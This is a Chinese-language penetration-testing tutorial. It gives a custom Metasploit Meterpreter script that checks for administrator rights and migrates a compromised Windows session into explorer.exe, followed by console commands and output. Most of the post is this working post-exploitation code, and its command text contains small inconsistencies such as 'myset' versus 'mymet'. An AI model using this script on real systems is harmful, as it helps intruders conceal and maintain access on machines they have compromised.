Gointerface接口声明实现及作用详解
341
2022-10-02
渗透之——Metasploit制作并运行自定义Meterpreper脚本(metasploit渗透教程)
注意:运行此脚本的前提是我们已经经过一系列的渗透,成功拿下了Meterpreter命令行。
这个脚本将会检查我们当前用户是否为管理员用户,然后找到explorer.exe进程,并自动迁移到这个进程中。
具体脚本mymet.rb如下:
### Author 冰河# Date 2019-01-14# Description Meterpreter脚本实例,检查 我们当前是否为管理员用户,然后找到exeplorer进程,并自动迁移到这个进程中##admin_check=is_admin?if(admin_check) print_good("Current User Is Admin")else print_error("Current User Is Not Admin")endsession.sys.process.get_processes().each do |x| if x['name'].downcase == "explorer.exe" print_good("Explorer.exe Process is Running with PID #{x['pid']}") explorer_ppid = x['pid'].to_i print_good("Migrating to Exeplorer.exe at PID #{explorer_ppid.to_s}") session.core.migrate(explorer_ppid) endend
接下来,我们将脚本mymet.rb上传到Kali的/usr/share/metasploit-framework/scripts/meterpreter目录下。
首先,我们现在Meterpreter上执行如下命令:
meterpreter > getuidServer username: NT AUTHORITY\SYSTEMmeterpreter > meterpreter > getpidCurrent pid: 684meterpreter > psProcess List============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ----2208 2168 explorer.exe x64 1 liuyazhuang-PC\liuyazhuang C:\Windows\explorer.exe
可以看到当前的用户是管理员权限,当前session绑定的进程ID是684,explorer进程ID为2208
接下来我们在Meterpreter命令行下运行如下命令:
run myset
输出如下:
meterpreter > run mymet [+] Current User Is Admin[+] Explorer.exe Process is Running with PID 2208[+] Migrating to Exeplorer.exe at PID 2208
如下:
可以看到,命令成功运行
此时我们再次查看当前session绑定的PID
meterpreter > getpidCurrent pid: 2208
可以看到当前session已经绑定到explorer.exe进程了。
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~